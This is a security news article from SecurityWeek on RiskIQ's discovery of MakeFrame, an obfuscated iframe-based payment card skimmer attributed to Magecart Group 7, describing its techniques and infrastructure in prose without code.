Security Experts:

Connect with us

Hi, what are you looking for?



Magecart Hackers Continue Improving Skimmers

A Magecart threat actor tracked as “Group 7” has been using a skimmer that creates iframes to steal payment card data, RiskIQ reveals.

A Magecart threat actor tracked as “Group 7” has been using a skimmer that creates iframes to steal payment card data, RiskIQ reveals.

Various versions of the skimmer were observed since January, featuring different levels of obfuscation, and 19 different victim sites were identified to date. In some cases, the compromised websites were abused to host the skimming code, load the code on compromised websites, and exfiltrate stolen data.

The skimmer, which RiskIQ dubbed MakeFrame, features hex-encoded strings and several layers of obfuscation, as well as an anti-analysis technique employing a check for beautifiers (which make code more readable for threat analysts). The code doesn’t execute properly if it has been beautified.

“This check means that a researcher has to deal with the blob of code if they want to deobfuscate it. For analysts experienced with deobfuscation, it just costs more time; for ones who are not, it could prevent them from figuring out what the code is doing,” RiskIQ explains.

Analysis of the malicious code revealed objects that directly refer to the creation of iframes for skimming payment data. The iframes are created so that the victim would enter payment data into them. A specific function is called to format the fake payment form, while another creates the “submit” button.

Thus, if the victim fills out the form and then presses the “submit” button, the card data is skimmed.

RiskIQ’s security researchers discovered three distinct versions of the skimmer, including in-development versions running debug processes, and one even including a version number.

The skimmer was observed hosted on all of the 19 infected domains identified to date, with the stolen data sent to the same server or another compromised domain.

“This method of exfiltration is the same as that used by Magecart Group 7, sending stolen data as .php files to other compromised sites for exfiltration. Each compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well,” the researchers explain.

Similarities in technique and code construction led RiskIQ to the conclusion that Magecart Group 7 is behind the new skimmer.

The researchers were also able to link the skimmer to two IPs that are running Debian, Apache, and OpenSSH and which are owned by Online SAS, a French cloud computing and web hosting company.

Magecart attacks went up by 20% amid the current COVID-19 pandemic, likely fueled by an increase in online shopping as people are working from home.

“This latest skimmer from Group 7 is an illustration of their continued evolution, honing tried and true techniques and developing new ones all the time. They are not alone in their endeavors to improve, persist, and expand their reach,” RiskIQ notes.

Related: Three Magecart Hackers Arrested in Indonesia

Related: Hunting for Magecart With

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...